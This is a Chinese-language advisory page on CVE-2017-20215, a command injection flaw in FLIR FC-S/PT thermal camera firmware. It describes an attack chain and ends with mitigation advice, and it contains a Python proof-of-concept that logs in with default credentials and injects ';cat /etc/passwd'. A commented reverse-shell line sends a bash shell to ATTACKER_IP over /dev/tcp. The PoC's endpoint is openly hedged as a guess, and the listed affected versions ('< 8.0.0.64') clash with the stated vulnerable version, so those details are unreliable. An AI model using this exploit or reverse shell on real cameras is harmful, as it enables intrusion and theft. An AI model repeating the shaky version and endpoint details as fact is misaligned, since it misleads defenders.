CVE-2017-20215: FLIR热成像摄像头FC-S/PT固件OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2017-20215

漏洞类型

操作系统命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FLIR Thermal Camera FC-S/PT

漏洞概述

CVE-2017-20215是FLIR公司生产的Thermal Camera FC-S/PT热成像摄像头固件版本8.0.0.64中存在的一个高危安全漏洞。该漏洞属于经过认证的操作系统命令注入（OS Command Injection）类型，允许已认证的攻击者通过未验证的输入参数向系统注入任意shell命令。成功利用此漏洞后，攻击者可以在受影响的设备上以root权限执行任意操作系统命令，从而获得对热成像摄像头系统的完全控制权。由于热成像摄像头通常部署在关键基础设施、工业环境和重要场所，攻击者可能借此漏洞进行间谍活动、窃取敏感数据或进一步渗透内网。该漏洞的CVSS评分高达8.8，属于高危级别，对网络安全构成严重威胁。攻击者利用该漏洞可以完全接管设备，修改系统配置，植入后门程序，甚至将受控设备作为进一步攻击其他系统的跳板。

技术细节

该漏洞的根本原因在于FLIR Thermal Camera FC-S/PT固件8.0.0.64版本中的输入验证机制存在严重缺陷。系统在处理用户输入参数时，未对特殊字符和命令分隔符进行有效的过滤和转义，导致攻击者可以在认证状态下通过构造包含shell命令的恶意请求来执行任意系统命令。具体来说，攻击者利用HTTP请求或其他管理接口，将分号（;）、管道符（|）、反引号（`）等命令连接符嵌入到正常参数值中，系统将这些特殊字符后的内容作为独立命令执行。由于设备以root权限运行服务，注入的命令同样以最高权限执行。攻击者通常利用此漏洞执行wget或curl命令下载恶意程序、开启telnet或ssh服务、修改root密码或添加新用户账户，从而建立持久化后门。漏洞存在于设备的管理web界面或API接口中，攻击者需要有效的认证凭证才能利用此漏洞，但低权限账户即可完成攻击，这大大降低了攻击门槛。

攻击链分析

STEP 1

1

信息收集阶段：攻击者对目标FLIR热成像摄像头进行网络侦察，发现存活主机并识别设备型号和固件版本

STEP 2

2

获取认证凭证：攻击者通过暴力破解、默认凭证、社会工程学或内部信息泄露等途径获取设备的登录账号密码

STEP 3

3

发送恶意请求：攻击者使用认证后的会话，通过HTTP/HTTPS请求向/cgi-bin/admin.cgi或类似管理接口发送包含命令注入载荷的请求

STEP 4

4

命令执行：设备固件未对输入参数进行严格过滤，shell命令分隔符（;、|、$()等）后的恶意命令被系统执行

STEP 5

5

建立后门：攻击者执行wget/curl下载恶意程序、修改系统配置、开启远程访问服务或添加后门账户以维持持久化控制

STEP 6

6

横向移动：攻击者利用被控设备作为跳板，对内网中的其他系统发起进一步攻击或窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2017-20215 PoC - FLIR Thermal Camera OS Command Injection
# Authenticated OS Command Injection on FLIR FC-S/PT firmware 8.0.0.64

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target-camera.local'
username = 'admin'
password = 'admin'

# Login to obtain session
login_url = f'{target}/login'
session = requests.Session()

# Authentication request
login_data = {
    'username': username,
    'password': password
}

try:
    response = session.post(login_url, data=login_data, timeout=10)
    print(f'[*] Login attempt completed. Status: {response.status_code}')
    
    # Command injection through vulnerable parameter
    # Inject command to create reverse shell or execute arbitrary command
    cmd_injection_url = f'{target}/cgi-bin/admin.cgi'
    
    # Example: Inject command to read /etc/passwd
    payload = {
        'action': 'ping',
        'host': '127.0.0.1;cat /etc/passwd'
    }
    
    exploit_response = session.get(cmd_injection_url, params=payload, timeout=10)
    print(f'[*] Exploit sent. Response length: {len(exploit_response.text)}')
    print(f'[*] Response preview: {exploit_response.text[:500]}')
    
    # Alternative: Reverse shell payload example
    # host='127.0.0.1;bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'
    
except requests.exceptions.RequestException as e:
    print(f'[!] Request failed: {e}')
    print('[*] Note: Target may be offline or not vulnerable')

影响范围

FLIR Thermal Camera FC-S/PT firmware version 8.0.0.64

FLIR FC-S series firmware < 8.0.0.64

FLIR PT series firmware < 8.0.0.64

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：首先，立即将设备从公网环境移除或通过防火墙严格限制访问，仅允许受信任的管理网段访问；其次，修改所有默认管理凭证为强密码，并定期轮换；第三，禁用不必要的远程管理协议，仅保留必要的HTTPS接口；第四，启用设备日志功能并集中收集分析，实时监控异常行为；第五，部署网络入侵检测系统，对包含特殊字符的HTTP请求进行告警和阻断；最后，建立资产清单，持续监控固件版本状态，一旦有安全更新立即应用。